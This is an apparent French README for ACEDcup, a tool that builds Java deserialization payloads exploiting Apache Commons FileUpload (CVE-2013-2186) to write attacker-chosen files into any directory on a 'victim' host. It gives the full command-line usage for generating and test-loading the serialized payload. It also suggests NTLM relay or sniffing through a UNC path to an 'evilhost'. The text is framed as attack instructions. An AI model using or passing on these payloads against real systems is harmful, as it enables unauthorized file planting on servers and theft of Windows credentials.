
Générateur de payload pour attaque par désérialisation binaire Java avec Commons FileUpload (CVE-2013-2186)
L'outil ACEDcup est un générateur de charges utiles pour l'attaque de désérialisation binaire Java (ACED)
Pour Apache Commons FileUpload ver <= 1.3 (CVE-2013-2186) et Oracle JDK ver < 7u40
L'attaque fonctionne même avec les versions plus récentes de la librairie ou de Java. Nous pouvons téléverser n'importe quel contenu dans n'importe quel répertoire, mais nous ne pouvons pas contrôler le nom du fichier (quelque chose comme upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) dans cette situation. Cependant, cela peut être utile dans certains cas.
Nous pouvons également effectuer une attaque de relais/reniflage NTLM (en utilisant \\evilhost\any\path) si votre cible est sur un système d'exploitation Windows.
1) Tout d'abord, nous créons une charge utile sérialisée :
java -jar aced_cup.jar /path/payload /path/target /path/out 1
/path/payload - le chemin vers un fichier contenant votre charge utile
/path/target - le chemin vers un fichier qui sera créé sur votre victime (cela sera stocké dans la charge utile sérialisée)
/path/out - le chemin vers un fichier contenant la charge utile sérialisée
0 - désactive la terminaison par octet nul si vous attaquez un système corrigé (sans octet nul - par défaut)
2) Ensuite, nous chargeons la charge utile sérialisée dans le lecteur sérialisé (si nous voulons tester la vulnérabilité sur votre hôte) :
java -jar ser_reader serialized_payload.txt
ser_reader tente de désérialiser la charge utile et, en raison d'une vulnérabilité dans sa bibliothèque, crée un nouveau fichier dans le répertoire spécifié.
java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt
```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````